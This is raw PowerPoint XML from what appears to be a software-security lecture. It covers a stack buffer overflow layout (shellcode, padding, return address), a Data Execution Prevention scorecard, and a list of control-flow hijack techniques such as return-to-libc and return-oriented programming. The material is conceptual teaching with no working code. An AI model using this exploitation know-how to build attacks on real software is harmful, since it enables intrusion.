          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4391833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 ^ X</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="3398837"/>
            <a:ext cx="5105400" cy="2544763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each memory page is</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>exclusively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> either</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>writable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> executable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91677494"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1028700" y="2515059"/>
          <a:ext cx="7086600" cy="518159"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3771900"/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="36724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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>padding</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Arc 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1028700" y="2085471"/>
            <a:ext cx="6591300" cy="883604"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7758"/>
              <a:gd name="adj2" fmla="val 1078451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1643454" y="5577518"/>
            <a:ext cx="5857092" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r" defTabSz="457200">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a Denial-of-Service attack!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Explosion 1 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2743200"/>
            <a:ext cx="2590800" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>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CRASH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18555536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 Scorecard</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5265182"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1737360"/>
          <a:ext cx="8229600" cy="4114800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{FABFCF23-3B69-468F-B69F-88F6DE6A72F2}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2438400"/>
                <a:gridCol w="5791200"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Aspect</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Execution Prevention</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Performance</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>with hardware support: no impact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>otherwise:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>reported to be &lt;1% in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
                        <a:t>PaX</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Deployment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>kernel support </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>(common on all platforms)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>modules opt-in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>(less frequent in Windows)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Compatibility</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>can break legitimate programs</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="800100" lvl="1" indent="-342900">
                        <a:buFont typeface="Lucida Grande"/>
                        <a:buChar char="-"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Just-In-Time compilers</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="800100" lvl="1" indent="-342900">
                        <a:buFont typeface="Lucida Grande"/>
                        <a:buChar char="-"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>unpackers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Safety Guarantee</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="0" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>code injected to NX pages never execute</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>but code injection may not be necessary…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="754893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 Flow Hijack: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Always control + computation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="8229600" cy="2849563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>computation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="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407898425"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="895350" y="2515059"/>
          <a:ext cx="7353300" cy="518159"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3913853"/>
                <a:gridCol w="2292965"/>
                <a:gridCol w="1146482"/>
              </a:tblGrid>
              <a:tr h="36724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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t> (aka</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t> payload)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>padding</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1143000" y="2085471"/>
            <a:ext cx="6591300" cy="883604"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7758"/>
              <a:gd name="adj2" fmla="val 1078451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B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4267200"/>
            <a:ext cx="8229600" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="292100" indent="-292100" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="635000" indent="-292100" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1320800" indent="-177800" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heap metadata overwrite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>return-oriented programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Right Brace 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5092700" y="4267200"/>
            <a:ext cx="304800" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">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Rounded Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="4313237"/>
            <a:ext cx="3352800" cy="1325563"/>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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Same principle,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
